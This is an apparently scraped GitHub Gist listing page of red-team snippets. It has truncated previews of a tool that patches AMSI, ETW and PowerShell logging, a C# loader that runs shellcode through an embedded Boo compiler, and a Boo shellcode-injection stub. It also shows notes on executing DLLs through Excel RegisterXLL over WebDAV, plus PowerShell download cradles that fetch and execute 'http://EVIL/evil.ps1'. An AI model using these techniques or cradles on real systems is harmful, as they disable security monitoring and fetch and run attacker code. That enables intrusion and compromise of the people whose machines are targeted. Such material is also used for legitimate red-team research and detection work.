This concept is very much like .jar or .war archives in Java.
NOTE: The built
.pyzzipapp can run on both Python 2 & 3 but you can only build.pyzzipapps with Python 3.5 or later.
Marcello byt3bl33d3r
🧛
byt3bl33d3r
/ nessus_parser.py
Last active
November 4, 2019 19:46
Python context manager that parses .Nessus files for discovered http/https servers using xmltodict
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import xmltodict | |
| from contextlib import ContextDecorator | |
| """ | |
| with NessusParser("path/to/dotnessusfile.nessus") as parser: | |
| for url in parser: | |
| print(url) | |
| """ | |
| class NessusParser(ContextDecorator): |
byt3bl33d3r
/ zipapp.md
Created
October 21, 2019 23:10
— forked from lukassup/zipapp.md
Python zipapp
byt3bl33d3r
/ Invoke-LetMeIn
⚠️ not Transcription logging! ⚠️ ) using an embedded Boolang Compiler within Powershell
Last active
January 16, 2022 23:42
Patch AMSI, ETW and PS ScriptBlock + Module logging (
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-LetMeIn | |
| { | |
| $BooLangDLL = @' | |
| vH0HfJRF+v/MvJvdzW4CbMpuIEBCCSyhBQiwJIGEZkGwYCEBC1UBlcUEEAiL9BAICIiKqKiIDVE5KyBnRUVFxXY2sJ9nO8/zvDvvzh/+nzJv2d0k5F/uz4c8+37nmfrMM8+Ud2becRM3CUMI4YK/334TYp/gfxXi5P+WwV+rvAOtxKOpr3XaJ8e+1um8mbNq8udWRy+rnnJl/rQpc+ZE5+VPnZFfPX9O/qw5+aPOOjf/yuj0GX3S031ddRxnjxZirDTi4v1UqE5+6RUiSwnhZbePB8BzPmZMce7wWXG+hbB/xTJF7kvTDChXxWoh2tB/+9f6oX+bIN4zBMfrdYnkf5OVSGuBLJL+5VtZp39ewKc5cJ95MxbOg98vM3W5sjjfCVFM7lNdUz0Nw7s4j8INv8F4jxXwv0/1jCui4DFN55niap/kb0RiNp8ZwH4wb0qkiPPeFiIyWYrUBH/vvMX1fbJ/mUVStIJfKURALAXq8kXQ3V0oRC7wusbzhFqGv0Y0qqBkxylVNzmJY4WyDebJIzLbcXZmq5oUIXwxrHYVBkFAcCMGuuMqhHQNUUhlEAFV68K43X61BB88RhhcffMg1lx3GGhPn9tT8fFvv/1WKE4SztVkuFwI9waEM7AsqhazdBSec8MeCJIholD3viFYGe670Nkf2YUlYI9RKI0v6gOSHhkErhlG2A8gzTsfvQ7pYvu0o/RG05ByZMcncKh0cCp5CjJ0vBU5nAiCfHKjAHzHVC0KBsQqema6Aq4GijqEMduRamd8dgdcfqooT6FguZeKsXVUlSSjUWYFG65oa0w2A56rQShzXUYY/PtqAkAWc7bBD+aW5UlS4EdXFEL5CofZlZeClZdZpMQpgtpwAL2ioz+YFsnD7Hi3+9zz3Zh5liY+pkfawrM3VJnm9WycVf4+SCBLMzCLqYVjVE1H1BS3pSmFF0DEbspbTRaKPxtIt0LSV8Cg+VSP6CMKU |
byt3bl33d3r
/ ExcelXLL.md
Created
September 14, 2019 07:58
— forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
byt3bl33d3r
/ lethalhta.boo
Last active
September 14, 2019 02:16
Boolang port of LethalHTA (https://github.com/codewhitesec/LethalHTA)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System | |
| import System.Runtime.CompilerServices | |
| import System.Runtime.InteropServices | |
| import System.Runtime.InteropServices.ComTypes | |
| public struct FILETIME: | |
| public dwLowDateTime as int | |
| public dwHighDateTime as int |
byt3bl33d3r
/ BooBeacon.cs
Created
June 17, 2019 00:07
— forked from Ne0nd0g/BooBeacon.cs
C# w/ embedded Boo lang compiler to execute Boo lang script that executes provided shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.Reflection; | |
| using System.Collections; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using Boo.Lang.Compiler; | |
| using Boo.Lang.Compiler.IO; | |
| using Boo.Lang.Compiler.Pipelines; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> | |
| <Target Name="Example"> | |
| <ItemGroup> | |
| <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" /> | |
| </ItemGroup> | |
| <PropertyGroup> | |
| <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile> | |
| </PropertyGroup> | |
| <XslTransformation | |
| OutputPaths="output.%(XmlFiles.FileName).html" |
byt3bl33d3r
/ LoadXSLFromMem.cs
Created
June 11, 2019 22:00
— forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace TryCOMXSLLoad | |
| { | |
| class Program |
byt3bl33d3r
/ DownloadCradles.ps1
Created
December 13, 2018 02:25
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
byt3bl33d3r
/ shellcode.boo
Last active
December 7, 2018 22:57
Boolang shellcode injection via CreateThread/WaitForSingleObject
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System.Runtime.InteropServices | |
| from System import IntPtr | |
| [DllImport("kernel32.dll")] | |
| def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as int, flProtect as int) as int: | |
| pass | |
| [DllImport("kernel32.dll")] | |
| def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int: | |
| pass |